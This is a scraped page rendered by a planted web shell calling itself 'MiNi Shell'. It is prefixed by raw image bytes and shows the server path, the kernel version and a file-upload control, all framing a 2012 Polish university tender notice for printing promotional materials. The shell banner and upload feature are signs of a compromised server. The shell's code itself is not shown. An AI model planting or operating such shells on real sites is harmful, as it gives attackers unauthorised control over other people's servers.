JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120124/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120124/21311-N-2012.html

<p class="kh_header"><b>Nowy Sącz: Świadczenie usługi drukowania i dostawa druków promocyjnych na potrzeby Państwowej Wyższej Szkoły Zawodowej w Nowym Sączu</b><br>
<b>Numer ogłoszenia: 21311 - 2012; data zamieszczenia: 24.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Państwowa Wyższa Szkoła Zawodowa w Nowym Sączu , ul. Staszica 1, 33-300 Nowy Sącz, woj. małopolskie, tel. 018 4434545, faks 018 4434545.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://zp.pwsz-ns.edu.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usługi drukowania i dostawa druków promocyjnych na potrzeby Państwowej Wyższej Szkoły Zawodowej w Nowym Sączu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest świadczenie usługi drukowania i dostawa druków promocyjnych na potrzeby Państwowej Wyższej Szkoły Zawodowej w Nowym Sączu zwanych dalej (drukami)
2.Wykonawca jest zobowiązany do wykonania przedmiotu zamówienia zgodnie z warunkami i postanowieniami niniejszej specyfikacji oraz wzoru umowy stanowiącego załącznik nr 1.
3.	W skład zamówienia wchodzą:
1)	Część I -  Informator ulotki, plakaty, teczki, torby, nalepki
A.	Informator dla kandydatów na studia na rok akademicki 2012-2013                                            
B.	Ulotki informacyjne ogólne dla kandydatów na studia (rozkładane na trzy części)                                               
C.	Ulotki informacyjne  dla kandydatów na studia (rozkładane instytutowe)                                                          
D.	Ulotki informacyjne  dla kandydatów na studia (DL - jeden listek, dwustronny kolor)     
E.	Ulotki informacyjne  dla kandydatów na studia (A4 łamana na 3 części, dwustronny kolor)                                   
F.	Teczki uczelniane zielone z logo i zdjęciami        
G.	Teczki uczelniane zielone z logo        
H.	Plakaty dwustronne do autobusu                                  
I.	Plakaty jednostronne                      
J.	Torby papierowe małe                                
K.	Torby papierowe duże                             
L.	Nalepki  PWSZ logo na foli samoprzylepnej  małe                                    
M.	Nalepki  PWSZ logo na foli samoprzylepnej  duże           
                       
2)	Część II - Ulotki, teczki, plakaty na potrzeby projektu Start do kariery przygotowanie studentów i absolwentów do wejścia na rynek pracy:
A.	Ulotki promujące zadania w Projekcie Start do Kariery rozkładane na trzy części                  
B.	Ulotki promujące zadania w Projekcie Start do Kariery dwustronne ( 2 wersje - grafika jednakowa, różny tekst)                
C.	Teczki (aktówki) z logo  Start do kariery                                          
D.	Plakaty promujące zadania Projektu: Start do kariery (3 wersje - grafika jednakowa, różny tekst)                               
E.	Certyfikaty ukończenia studiów podyplomowych Start do kariery                                    

3)	Część III - Informator, ulotki dla studentów niepełnosprawnych
A.	Ulotki informacyjne dla kandydatów na studia posiadający orzeczenie o niepełnosprawności (rozkładana)    
B.	Informator dla osób niepełnosprawnych                     

4)	Część IV - Plakaty, ulotki na potrzeby Uczelnianej Rady Samorządu Studentów
A.	Ulotki informacyjne ogólne dla studentów 1-go roku                  
B.	Plakaty jednostronne      
         
5)	Część V - ulotki, plakaty, dyplomy na potrzeby Instytutu Ekonomicznego
A.	Ulotki na konkurs wiedzy ekonomicznej                            
B.	Plakaty (studia podyplomowe)               
C.	Plakaty na konkurs wiedzy ekonomicznej                                    
D.	Dyplom dla wyróżnionych absolwentów                                     

6)	Część VI - Informator dla kandydatów na studia podyplomowe
A.	Informator dla kandydatów na studia podyplomowe, kursy dokształcające i szkolenia na rok 2012-2013        
  
7)	Część VII - ankiety  ewaluacyjne na potrzeby projektu Inżynier mechatroniki - napędem do rozwoju innowacyjnego przemysłu i konkurencyjnej gospodarki
A.	Ankiety ewaluacyjne na potrzeby projektu Inżynier mechatroniki - napędem do rozwoju innowacyjnego przemysłu i konkurencyjnej gospodarki                                      
5.	Zamawiający przewiduje prawo opcji. Zamawiający przyznaje sobie prawo do zwiększenia  lub zmniejszenia ilości zamawianych druków w granicach +/- 10% całkowitej wartości umowy z Wykonawcą. Ostateczna ilość poszczególnych druków będzie wynikała z faktycznych potrzeb Zamawiającego w okresie obowiązywania umowy. W przypadku zwiększenia lub zmniejszenia nakładu druków wyszczególnionych w ofercie -  oferowana cena jednostkowa brutto zamawianych druków nie może ulec zmianie.
6.	W przypadku objętości informatorów Zamawiający przewiduje możliwość zmiany ilości stron o +/- 10 procent. Zmiana ilości stron nie wpłynie na cenę.
7.	Zamawiający przekaże wszystkie materiały do przygotowania projektów druków na płycie CD/DVD lub drogą elektroniczną, w formie materiałów roboczych w formacie WORD lub PDF.  Do obowiązków Wykonawcy należy przygotowanie projektów graficznych, oraz przesłanie ich w formie elektronicznej i w postaci wydruku próbnego do zamawiającego. Po uwzględnieniu ewentualnych poprawek zgłoszonych przez zamawiającego do próbnego wydruku i  uzyskani akceptacji Zamawiającego Wykonawca przystąpi do ostatecznego wydruku.
8.	Wykonawca na prośbę Zamawiającego jest zobowiązany przesłać ostatecznie zaakceptowany wydruk na płycie CD_DVD lub drogą elektroniczną.
9.	Numer ISBN dla informatorów nadaje Zamawiający
10.	Zamawiający dopuszcza możliwość zamawiania przewidywanego nakładu poszczególnych druków partiami w zależności od zapotrzebowania.
11.	Wykonawca dostarczy druki  na własny koszt i ryzyko  do następujących miejsc:
1)	Druki zamawiane w zakresie części I i VI Wykonawca zobowiązuje się dostarczyć do Rektoratu przy ul. Staszica 1 w Nowym Sączu.
2)	Druki zamawiane w zakresie części II Wykonawca zobowiązuje się dostarczyć do Biura Karier przy ul. Długosza 61 w Nowym Sączu.
3)	Druki zamawiane w zakresie części III,IV i VII  Wykonawca zobowiązuje się dostarczyć do Instytutu Technicznego przy ul. Zamenhofa 1 A w Nowym Sączu.
4)	Druki zamawiane w zakresie V  Wykonawca zobowiązuje się dostarczyć do Instytutu Ekonomicznego  przy ul. Jagiellońskiej 61 w Nowym Sączu (Wejście od Alei Wolności)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt 6 ustawy.
A.	Określenie przedmiotu zamówień uzupełniających: świadczenie usług drukowania i dostawy
B.	Określenie zakresu zamówień uzupełniających: 20% wartości  zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-8, 79.80.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy posiadają uprawnienia do wykonania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania2) Ocena spełniania warunków udziału w postępowaniu zostanie dokonana według formuły: spełnia - nie spełnia w oparciu o oświadczenie o spełnianiu warunków opartych na przepisie art. 22 ust. 1 pkt. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia 2) Ocena spełniania warunków udziału w postępowaniu zostanie dokonana według formuły: spełnia - nie spełnia w oparciu o oświadczenie o spełnianiu warunków opartych na przepisie art. 22 ust. 1 pkt. 1 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym 2) Ocena spełniania warunków udziału w postępowaniu zostanie dokonana według formuły: spełnia - nie spełnia w oparciu o oświadczenie o spełnianiu warunków opartych na przepisie art. 22 ust. 1 pkt. 3 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonywania zamówienia. 2) Ocena spełniania warunków udziału w postępowaniu zostanie dokonana według formuły: spełnia - nie spełnia w oparciu o oświadczenie o spełnianiu warunków opartych na przepisie art. 22 ust. 1 pkt. 3 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy znajdują się w sytuacji ekonomicznej i finansowej pozwalającej na realizację zamówienia,  2) Ocena spełniania warunków udziału w postępowaniu zostanie dokonana według formuły: spełnia - nie spełnia w oparciu o oświadczenie o spełnianiu warunków opartych na przepisie art. 22 ust. 1 pkt. 3 ustawy Prawo zamówień publicznych.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)OŚWIADCZENIE o spełnieniu warunków, o których mowa w art. 22 ust. 1 ustawy, 2)Pisemne zobowiązanie podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia, w przypadku, jeżeli Wykonawca polega na wiedzy na doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b) ustawy Pzp (jeżeli dotyczy)</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://zp.pwsz-ns.edu.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Rektorat Państwowej Wyższej Szkoły Zawodowej w Nowym Sączu przy ul. Staszica 1, pok. nr 17.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.02.2012 godzina 12:45, miejsce: na adres: Państwowa Wyższa Szkoła Zawodowa w Nowym Sączu, 33-300 Nowy Sącz, ul. Staszica 1 - Sekretariat Ogólny - pokój 16 (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program Operacyjny Kapitał Ludzki Narodowa Strategia Spójności:
1. Inżynier mechatroniki - napędem do rozwoju innowacyjnego przemysłu i konkurencyjnej gospodarki.
2. Start do kariery przygotowanie studentów i absolwentów do wejścia na rynek pracy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I -  Informator ulotki, plakaty, teczki, torby, nalepki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A.	Informator dla kandydatów na studia na rok akademicki 2012-2013                                            
B.	Ulotki informacyjne ogólne dla kandydatów na studia (rozkładane na trzy części)                                               
C.	Ulotki informacyjne  dla kandydatów na studia (rozkładane instytutowe)                                                          
D.	Ulotki informacyjne  dla kandydatów na studia (DL - jeden listek, dwustronny kolor)     
E.	Ulotki informacyjne  dla kandydatów na studia (A4 łamana na 3 części, dwustronny kolor)                                   
F.	Teczki uczelniane zielone z logo i zdjęciami        
G.	Teczki uczelniane zielone z logo        
H.	Plakaty dwustronne do autobusu                                  
I.	Plakaty jednostronne                      
J.	Torby papierowe małe                                
K.	Torby papierowe duże                             
L.	Nalepki  PWSZ logo na foli samoprzylepnej  małe                                    
M.	Nalepki  PWSZ logo na foli samoprzylepnej  duże.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-8, 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II - Ulotki, teczki, plakaty na potrzeby projektu Start do kariery przygotowanie studentów i absolwentów do wejścia na rynek pracy.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A.	Ulotki promujące zadania w Projekcie Start do Kariery rozkładane na trzy części                  
B.	Ulotki promujące zadania w Projekcie Start do Kariery dwustronne ( 2 wersje - grafika jednakowa, różny tekst)                
C.	Teczki (aktówki) z logo  Start do kariery                                        
D.	Plakaty promujące zadania Projektu: Start do kariery (3 wersje - grafika jednakowa, różny tekst)                               
E.	Certyfikaty ukończenia studiów podyplomowych Start do kariery.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-8, 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część III - Informator, ulotki dla studentów niepełnosprawnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A.	Ulotki informacyjne dla kandydatów na studia posiadający orzeczenie o niepełnosprawności (rozkładana)    
B.	Informator dla osób niepełnosprawnych.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-8, 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część IV - Plakaty, ulotki na potrzeby Uczelnianej Rady Samorządu Studentów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A.	Ulotki informacyjne ogólne dla studentów 1-go roku                  
B.	Plakaty jednostronne.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-8, 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część V - ulotki, plakaty, dyplomy na potrzeby Instytutu Ekonomicznego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A.	Ulotki na konkurs wiedzy ekonomicznej                            
B.	Plakaty (studia podyplomowe)               
C.	Plakaty na konkurs wiedzy ekonomicznej                                    
D.	Dyplom dla wyróżnionych absolwentów.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-8, 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część VI - Informator dla kandydatów na studia podyplomowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A.	Informator dla kandydatów na studia podyplomowe, kursy dokształcające i szkolenia na rok 2012/2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-8, 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część VII - ankiety  ewaluacyjne na potrzeby projektu Inżynier mechatroniki - napędem do rozwoju innowacyjnego przemysłu i konkurencyjnej gospodarki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A.	Ankiety ewaluacyjne na potrzeby projektu Inżynier mechatroniki - napędem do rozwoju innowacyjnego przemysłu i konkurencyjnej gospodarki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.82.30.00-8, 79.80.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com